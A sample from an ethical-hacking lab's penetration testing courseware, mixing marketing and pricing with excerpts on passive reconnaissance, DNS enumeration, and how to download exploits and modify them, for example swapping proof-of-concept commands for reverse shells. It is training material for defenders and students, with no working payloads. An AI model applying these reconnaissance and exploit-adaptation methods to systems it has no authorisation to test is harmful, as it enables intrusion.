penetration testing - virtualhackinglabs.com · enumeration to exploitation. by enumerating the lab...
TRANSCRIPT
VIRTUAL HACKING LABS
PENETRATION TESTINGCOURSEWARE SAMPLE
WWW.VIRTUALHACKINGLABS.COM
INTRODUCTION
Our mission is to create the best Virtual Hacking Labs and training materials at an affordable rate for as much (aspiring) information security professionals as possible. The Virtual Hacking Labs want to provide continuously updated labs and courseware that can be used to maintain knowledge and skill levels that are expected from IT security professionals. We also want to make practical training available for anyone aspiring a job as ethical hacker or penetration tester. For this reason our courseware starts from the basics and gradually increases difficulty by covering more advanced subjects.
PENETRATION TESTING LABThe Virtual Hacking Labs is a penetration testing lab accompanied with extensive courseware covering the most important subjects in the field of penetration testing. The Virtual Hacking Labs contain many real world scenarios that allow you to learn and practice penetration testing in a safe environment. Many of these scenarios can be found at a lot of company IT environments and contain devices such as: Domain Controllers, Firewalls, Linux and Windows servers, NAS, Android devices and of course Windows and Linux clients. All devices and machines in the labs are configured to be intentionally vulnerable and can be exploited in one or more ways.
The courseware that is included with every access pass covers all phases of penetration testing, from enumeration to exploitation. By enumerating the lab machines you will learn how to gather information that can be used for vulnerability assessments and finally to exploit the machines. In the labs you will learn how to enumerate and exploit protocols such has FTP, SNMP & SMB. You will also learn how to exploit web applications
that are vulnerable to Remote Code Execution, SQL injection, Local File Inclusion, Remote File inclusion and many more vulnerabilities. After getting an initial command line shell on an exploited target, you will have the opportunity to practice privilege escalation techniques that are used to upgrade the current shell with administrator priviliges.
LAB ACCESSAccess to the Virtual Hacking Labs is provided through a VPN client which connects you to the network as if it is a real company network. We provide several popular pre-configured penetration testing distributions such as Kali Linux and Parrot Security OS. Installing the penetration testing distribution of your choice is very easy and usually consists of a few clicks.
VULNERABLE HOSTSIn the labs you will learn how to compromise both Windows and Linux hosts running webservers, mail servers, development tools and many more services and protocols. You will also encounter network devices like virtual firewalls, routers and NAS systems commonly used in both personal and enterprise settings. Every system is configured to contribute to a specific learning experience using one or more attack vectors.
We are keeping the labs up-to-date with new machines and recently discovered vulnerabilities with high impact on a monthly basis. This is how we want to keep your knowledge and experience up-to-date.
ABOUT USThe Virtual Hacking Labs is an InfoSec e-learning company focusing on practical penetration testing training solutions. We believe that the most effective and efficient learning approach is to combine practical scenario based training with easy to understand courseware. To fulfil this learning experience we have created a full virtual penetration testing environment called: The Virtual Hacking Labs.
TRAINING MATERIALSAlong with the lab access we provide all the written courseware and documentation that is needed to learn penetration testing and be successful in the labs. We are keeping the training material up-to-date continuously to make sure you will learn the latest insights and techniques in the field of ethical hacking.
The courseware is written in a way that is easily understandable for anyone new in the field of penetration testing. We start with the very basics of penetration testing and gradually increase the difficulty by covering more advanced subjects.
RESET PANELThe Virtual Hacking Labs reset panel can be used to reset hosts in the lab network back to their original state. Resetting a host is particularly useful when a host is left in a state where it is not vulnerable anymore. Resetting the host will give you a fresh start on the machine. Every student is allowed to reset hosts in the lab every 15 minutes through the reset panel. This guarantees an effective learning experience as designed without delays.
STUDENT PANELAll students have access to a dedicated student panel that can be used to track your course and lab progress. This panel also provides information about the lab machines, including hints for anyone that’s stuck at a specific box. This way you can choose what your learning path will look like.
Do you prefer a full black box approach and root all machines on your own or do you prefer a balance between theoretical and practical part of the course with some help along the way?
The hints are not direct solutions for the lab machines but they contain enough information to push you in the right direction. To keep the Virtual Hacking Labs challenging for everyone we only provide hints for the Beginner and Advanced machines. The Advanced+ hosts are the final challenge and are excluded from hints.
CERTIFICATE OF COMPLETIONFor those who managed to get root/administrator access on at least 20 lab machines can request a certificate of completion. This trophy consists of a PDF certificate with your name and a set of badges to use for social media such as LinkedIn. The VHL Certificate of Completion is included at no additional cost with a month pass and greater.
To be eligible for the VHL Certificate of Completion you need to:1. Get root/administrator access on at least 20 lab machines.2. Supply documentation of the exploited vulnerabilities.3. Supply screenshots proving that you rooted the lab machines.4. Supply the contents of key.txt files from the rooted lab machines.
The documentation should at least contain information about the exploited vulnerabilities, such as the CVE ID’s, used exploits and screenshots of the exploitation process. The screenshots should contain at least the following information: Lab machine IP, your IP and the used commands (command line, URL’s, requests etc.). For privilege escalation also include screenshots with the output of the id/whoami/getuid command before and after executing the exploit.
After submitting the documentation we will manually verify the information and check the authenticity of the screenshots. Be sure to include your student ID and full name to display on the Certificate of Completion in the documentation. Also use the e-mail address you have signed up with to the Virtual Hacking Labs. When the supplied documentation and screenshots have been approved we will send the Certificate of Completion as soon as possible.
PRICINGAccess passes includes all access to our labs, online courseware, courseware e-book and a certificate of completion. Except for the week pass which does not include the certificate and the e-book version of the courseware.
1 week access $49 €461 month access $99 €933 month access $249 €2336 month access $449 €4191 year access $749 €699
Completing the penetration testing course may qualify you for 40 (ISC)² CPE and EC Council credit hours. The Certificate of Completion can be used as proof for completing the course.
COURSE TABLE OF CONTENTS
1. PENETRATION TESTING BASICS1. Intro2. About Penetration testing3. The Penetration process explained4. Jobs and professional opportunities
2. ACCESSING THE LABS1. Intro2. Installing Kali Linux3. VPN Access4. Reset panel5. Rules & Restrictions6. Legal7. Certificate of Completion8. Where to start from here?
3. INFORMATION GATHERING1. Intro2. Passive information gathering3. Active information gathering
4. VULNERABILITY ASSESSMENT1. Intro2. Metasploitable 2 enumeration information & Vul-
nerabilities3. Vulnerability & Exploit databases4. Nmap scripts5. OpenVAS automated vulnerability scanning
5. EXPLOITATION1. Intro2. How to work with exploits and where to find them3. Compiling Linux kernel exploits4. Compiling Windows exploits on Linux5. Transferring exploits6. Exploiting vulnerabilities in practice
6. PRIVILEGE ESCALATION1. Intro2. Privilege escalation on Linux3. Privilege escalation on Windows
7. WEB APPLICATIONS1. Intro2. Local and Remote File Inclusion (LFI/RFI)3. Remote Code Execution4. Remote Command Execution5. SQL Injection Basics6. Web shells7. File Upload Vulnerabilities
8. PASSWORD ATTACKS1. Intro2. Generating password lists3. Windows passwords and hashes4. Cracking hashes with John5. Web application passwords
9. NETWORKING & SHELLS1. Intro2. Netcat shells3. Upgrading a Netcat shell to Meterpreter
10. METASPLOIT1. Intro2. Basic Commands3. Exploit Commands4. Meterpreter Basics
Passive information gathering activities should be focused on identifying IP addresses, (sub)domains, external partners and services, technologies used, people employed and any other useful information. The information gathered from these activities could be employees working at the company, e-mail addresses, websites, external services used, customers, naming conventions, E-mail & VPN systems and sometimes even passwords. The sources which can be used for passive enumeration are numerous and consist of the following among many others:• Google• Social media like LinkedIn, Twitter & Facebook• Company websites• Press releases• Forums• Whois databases• Data breaches
SEMI PASSIVE INFORMATION GATHERINGEarlier we mentioned that passive information gathering does not touch company servers or leave logs of presence on target systems. When passive information gathering methods do connect to (company) servers but appear like regular traffic, we are talking about semi passive information gathering. Semi passive information gathering could be visiting the company website to collect information about employees. Visiting the company website is directly engaging with the target because we are connecting with a company server, or at least it’s owned and managed by the company. Since this traffic appears like regular traffic which is not distinct from other regular traffic it is considered semi passive.
DNS ENUMERATIONDNS enumeration is the process of identifying the DNS servers and the corresponding DNS records. DNS stands for Domain Name System which is a database containing information about domain names and IP addresses. The DNS records are the database records which associate the IP with the domain name. The most important records for DNS enumeration are the:• A (address) records containing the IP address of the
domain.• MX records which stand for mail exchange and
contain the mail exchange servers.
• CNAME records are records used for aliasing domains. CNAME stands for canonical name and associate sub-domains with existing domain DNS records.
• NS record which stands for name server indicating the authoritative name server for the domain.
• SOA records, which stands for State of Authority, contain information about the domain like the primary name server, a timestamp when the domain was last updated and the responsible party for the domain.
• PTR or pointer records mapping an IPv4 address to the CNAME on the host.
• TXT records contain text inserted by the administrator such as notes.
The information retrieved with DNS enumeration consists of names servers, IP addresses of potential targets such as mail servers, sub-domains etc. Some tools included with Kali Linux used for DNS enumeration are: whois, nslookup, dig, host and automated tools like Fierce, DNSenum and DNSrecon. Let’s go through these tools briefly and see how we can use them for DNS enumeration.
To read further, please purchase an access pass on our website www.virtualhackinglabs.com
Passive information gathering is the process of collecting information about a specific target from publicly available sources. This kind of information gathering is all about ‘getting to know your target’. The process of passive information gathering is often performed before starting the actual penetration test on the network and often returns valuable information for other stages of the penetration test. Many companies often leak intentionally or unintentionally information which can be picked up by hackers without even touching the company servers. The leaked information can be combined with other information which can be very helpful in later stages of the penetration test. Think of employee names combined with company naming conventions for account names. Also social media and company blogs can be a great source for passive information gathering.
3.2 PASSIVE INFORMATION GATHERING
Most exploits are scripts written in Python, Perl, Ruby or Bash and need to be downloaded to the attack box. On the attack box we need to analyse the exploit code to confirm that the exploit exactly does what it advertises. We don’t want to open backdoors on the attack machine, wipe an entire hard drive on the target machine with a remote root exploit or add the machine to a botnet. After we’ve verified that we’re dealing with an authentic exploit we often need to make a few modifications to make it work for our target. These modifications can be anything from simply adding a host, port or credentials to variables to replacing bind/reverse shellcode and modifying offsets in buffer overflow exploits.
Many exploits are written as proof of concepts (POC) which means that these scripts prove the fact that a target (service) is vulnerable. A proof of concept for a remote code execution vulnerability might just execute the ifconfig command and display the output on a webpage. This is pretty useless when you want to gain a shell on the host but it does prove that the command in the exploit was executed. The modification for this exploit would consist of replacing the ifconfig command with a reverse or bind shell command.
Another reason to read through the exploit code is for usage instructions. Most scripts take one or more arguments, such as a target host, a port and sometimes even credentials. Many exploits print the usage instructions to the terminal by default when you execute them without arguments. But remember that we aren’t executing anything yet in this stage. By analysing the exploit code we can find out which arguments are needed and how they are processed in the script. When you’re dealing with a remote exploit that doesn’t take a target host as argument you’re probably dealing with a fake and potentially dangerous exploit.
So far we’ve talked about exploits written in any of the scripting languages such as Python and Perl which can be executed using an interpreter. Many other exploits are written in programming languages like C that need to be compiled before we are able execute them. This is often the case for privilege escalation exploits for Linux and Windows. In the following chapters we will learn how to compile local privilege escalation exploits for Linux and Windows.
Now that we know the tasks that we’re up against before we can start executing exploits, let’s walk through the process by downloading, analysing, modifying and compiling some exploits.
DOWNLOADING EXPLOITSBefore we can start modifying an exploit we first need to download it to the attack machine. Transferring exploits to target hosts will be covered in a separate chapter since this involves very different techniques and sometimes tools. The easiest ways to get exploit is by downloading them from exploit-db via a browser or wget and by coping the exploit from searchsploit.
Simply press the download button to download the exploit to your machine:
We can also use wget to download the exploit from a command line:We can also use wget to download the exploit from a command line:
wget [URL to exploit download] -O 35513.py
Or we can copy the exploit from the searchsploit database:
Be sure to copy the exploit file to another location and not modify the original one. You might need to revert to the original file or need it again someday. Now that we have downloaded (or copied) the exploit we can start analysing and modifying the exploit code.To read further, please purchase an access pass on our website www.virtualhackinglabs.com
In the previous chapter we have used the exploit-db website and searchsploit to verify that exploits are available for the discovered vulnerabilities. Now we will have a look at where to go from there because these exploits will not download, modify and execute themselves (hopefully). After we have found an exploit for a known vulnerability we need to do a couple of things before we can safely launch it against a target.
5.2 HOW TO WORK WITH EXPLOITS
WWW.VIRTUALHACKINGLABS.COM